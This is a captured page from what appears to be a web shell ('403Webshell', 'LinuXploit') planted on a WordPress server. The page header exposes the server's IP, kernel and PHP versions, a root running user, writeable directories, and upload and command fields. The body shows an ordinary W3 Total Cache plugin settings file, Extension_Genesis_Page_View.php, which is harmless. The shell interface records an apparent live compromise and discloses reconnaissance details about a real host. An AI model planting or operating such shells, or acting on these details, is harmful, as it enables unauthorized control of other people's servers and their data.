403Webshell
Server IP : 130.225.57.55  /  Your IP : 216.73.216.60
Web Server : Apache
System : Linux wp-vhost07 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /srv/www/reco2st.eu/https/wp-content/plugins/w3-total-cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /srv/www/reco2st.eu/https/wp-content/plugins/w3-total-cache/Extension_Genesis_Page_View.php
<?php
/**
 * File: Extension_Genesis_Page_View.php
 *
 * @package W3TC
 */

namespace W3TC;

defined( 'ABSPATH' ) || exit;
if ( ! defined( 'W3TC' ) ) {
	die();
}
?>
<p>
	<?php esc_html_e( 'Genesis extension is currently ', 'w3-total-cache' ); ?>
	<?php
	if ( $w3tc_config->is_extension_active_frontend( 'genesis.theme' ) ) {
		echo '<span class="w3tc-enabled">' . esc_html__( 'enabled', 'w3-total-cache' ) . '</span>';
	} else {
		echo '<span class="w3tc-disabled">' . esc_html__( 'disabled', 'w3-total-cache' ) . '</span>';
	}
	?>
	.
<p>

<div class="metabox-holder">
	<?php Util_Ui::postbox_header( esc_html__( 'Header', 'w3-total-cache' ), '', 'header' ); ?>
	<table class="form-table">
		<?php
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'wp_head' ),
				'control'        => 'checkbox',
				'label'          => esc_html__( 'Cache wp_head loop:', 'w3-total-cache' ),
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'description'    => esc_html__( 'Cache wp_head. This includes the embedded CSS, JS etc.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'genesis_header' ),
				'control'        => 'checkbox',
				'label'          => esc_html__( 'Cache header:', 'w3-total-cache' ),
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'description'    => esc_html__( 'Cache header loop. This is the area where the logo is located.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'genesis_do_nav' ),
				'control'        => 'checkbox',
				'label'          => esc_html__( 'Cache primary navigation:', 'w3-total-cache' ),
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches the navigation filter; per page.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'genesis_do_subnav' ),
				'control'        => 'checkbox',
				'label'          => esc_html__( 'Cache secondary navigation:', 'w3-total-cache' ),
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches secondary navigation filter; per page.', 'w3-total-cache' ),
			)
		);
		?>
	</table>

	<?php Util_Ui::postbox_footer(); ?>

	<?php Util_Ui::postbox_header( esc_html__( 'Content', 'w3-total-cache' ), '', 'content' ); ?>
	<table class="form-table">
		<?php
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'loop_front_page' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache front page post loop:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches the front page post loop, pagination is supported.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'loop_terms' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache author/tag/categories/term post loop:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches the posts listed on tag, categories, author and other term pages, pagination is supported.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'         => array( 'genesis.theme', 'loop_terms_excluded' ),
				'control'     => 'textarea',
				'label'       => esc_html__( 'Excluded terms pages / posts:', 'w3-total-cache' ),
				'description' => esc_html__( 'List of pages / posts that should not have the terms loop cached. Specify one page / post per line. This area supports regular expressions.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'flush_terms' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Flush posts loop:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Flushes the posts loop cache on post updates. See setting above for affected loops.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'loop_single' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache single post / page:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches the single post / page loop, pagination is supported.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'         => array( 'genesis.theme', 'loop_single_excluded' ),
				'control'     => 'textarea',
				'label'       => esc_html__( 'Excluded single pages / posts:', 'w3-total-cache' ),
				'description' => esc_html__( 'List of pages / posts that should not have the single post / post loop cached. Specify one page / post per line. This area supports regular expressions.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'loop_single_genesis_comments' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache comments:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches the comments loop, pagination is supported.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'loop_single_genesis_pings' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache pings:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches the ping loop, pagination is supported. One per line.', 'w3-total-cache' ),
			)
		);
		?>
	</table>

	<?php Util_Ui::postbox_footer(); ?>

	<?php Util_Ui::postbox_header( esc_html__( 'Sidebar', 'w3-total-cache' ), '', 'sidebar' ); ?>
	<table class="form-table">
		<?php
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'sidebar' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache sidebar:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches sidebar loop, the widget area.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'         => array( 'genesis.theme', 'sidebar_excluded' ),
				'control'     => 'textarea',
				'label'       => esc_html__( 'Exclude pages:', 'w3-total-cache' ),
				'description' => esc_html__( 'List of pages that should not have sidebar cached. Specify one page / post per line. This area supports regular expressions.', 'w3-total-cache' ),
			)
		);
		?>
	</table>

	<?php Util_Ui::postbox_footer(); ?>

	<?php Util_Ui::postbox_header( esc_html__( 'Footer', 'w3-total-cache' ) ); ?>
	<table class="form-table">
		<?php
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'genesis_footer' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache genesis footer:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches footer loop.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'wp_footer' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Cache footer:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Caches wp_footer loop.', 'w3-total-cache' ),
			)
		);
		Util_Ui::config_item(
			array(
				'key'            => array( 'genesis.theme', 'reject_logged_roles' ),
				'control'        => 'checkbox',
				'checkbox_label' => esc_html__( 'Enable', 'w3-total-cache' ),
				'label'          => esc_html__( 'Disable fragment cache:', 'w3-total-cache' ),
				'description'    => esc_html__( 'Don\'t use fragment cache with the following hooks and for the specified user roles.', 'w3-total-cache' ),
			)
		);
		?>
	</table>

	<?php Util_Ui::postbox_footer(); ?>

	<?php Util_Ui::postbox_header( esc_html__( 'Exclusions', 'w3-total-cache' ), '', 'exclusions' ); ?>
	<table class="form-table">
		<tr>
			<td><?php esc_html_e( 'Select hooks', 'w3-total-cache' ); ?></td>
			<td>
				<?php
				$w3tc_saved_hooks = $w3tc_config->get_array( array( 'genesis.theme', 'reject_logged_roles_on_actions' ) );
				$w3tc_name        = Util_Ui::config_key_to_http_name( array( 'genesis.theme', 'reject_logged_roles_on_actions' ) );
				$w3tc_hooks       = array(
					'genesis_header'    => esc_html__( 'Header', 'w3-total-cache' ),
					'genesis_footer'    => esc_html__( 'Footer', 'w3-total-cache' ),
					'genesis_sidebar'   => esc_html__( 'Sidebar', 'w3-total-cache' ),
					'genesis_loop'      => esc_html__( 'The Loop', 'w3-total-cache' ),
					'wp_head'           => 'wp_head',
					'wp_footer'         => 'wp_footer',
					'genesis_comments'  => esc_html__( 'Comments', 'w3-total-cache' ),
					'genesis_pings'     => esc_html__( 'Pings', 'w3-total-cache' ),
					'genesis_do_nav'    => esc_html__( 'Primary navigation', 'w3-total-cache' ),
					'genesis_do_subnav' => esc_html__( 'Secondary navigation', 'w3-total-cache' ),
				);
				?>

				<input <?php disabled( $w3tc_config->is_sealed( 'genesis.theme' ) ); ?> type="hidden" name="<?php echo esc_attr( $w3tc_name ); ?>" value="" />
				<?php foreach ( $w3tc_hooks as $w3tc_hook => $w3tc_hook_label ) : ?>
					<input <?php disabled( $w3tc_config->is_sealed( 'genesis.theme' ) ); ?>
						type="checkbox" name="<?php echo esc_attr( $w3tc_name ); ?>[]"
						value="<?php echo esc_attr( $w3tc_hook ); ?>"
						<?php checked( in_array( $w3tc_hook, $w3tc_saved_hooks, true ) ); ?>
						id="role_<?php echo esc_attr( $w3tc_hook ); ?>" />
					<label for="role_<?php echo esc_attr( $w3tc_hook ); ?>">
						<?php echo esc_html( $w3tc_hook_label ); ?>
					</label><br />
				<?php endforeach; ?>

				<p class="description">
					<?php esc_html_e( 'Select hooks from the list that should not be cached if user belongs to any of the roles selected below.', 'w3-total-cache' ); ?>
				</p>
			</td>
		</tr>
		<tr>
			<td><?php esc_html_e( 'Select roles:', 'w3-total-cache' ); ?></td>
			<td>
				<?php
				$w3tc_saved_roles = $w3tc_config->get_array( array( 'genesis.theme', 'reject_roles' ) );
				$w3tc_name        = Util_Ui::config_key_to_http_name( array( 'genesis.theme', 'reject_roles' ) );
				?>
				<input type="hidden" name="<?php echo esc_attr( $w3tc_name ); ?>" value="" />
				<?php foreach ( get_editable_roles() as $w3tc_role_name => $w3tc_role_data ) : ?>
					<input <?php disabled( $w3tc_config->is_sealed( 'genesis.theme' ) ); ?>
						type="checkbox" name="<?php echo esc_attr( $w3tc_name ); ?>[]"
						value="<?php echo esc_attr( $w3tc_role_name ); ?>"
						<?php checked( in_array( $w3tc_role_name, $w3tc_saved_roles, true ) ); ?>
						id="role_<?php echo esc_attr( $w3tc_role_name ); ?>" />
					<label for="role_<?php echo esc_attr( $w3tc_role_name ); ?>">
						<?php echo esc_html( $w3tc_role_data['name'] ); ?>
					</label>
				<?php endforeach; ?>
				<p class="description">
					<?php esc_html_e( 'Select user roles that should not use the fragment cache.', 'w3-total-cache' ); ?>
				</p>
			</td>
		</tr>
	</table>

	<?php Util_Ui::postbox_footer(); ?>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit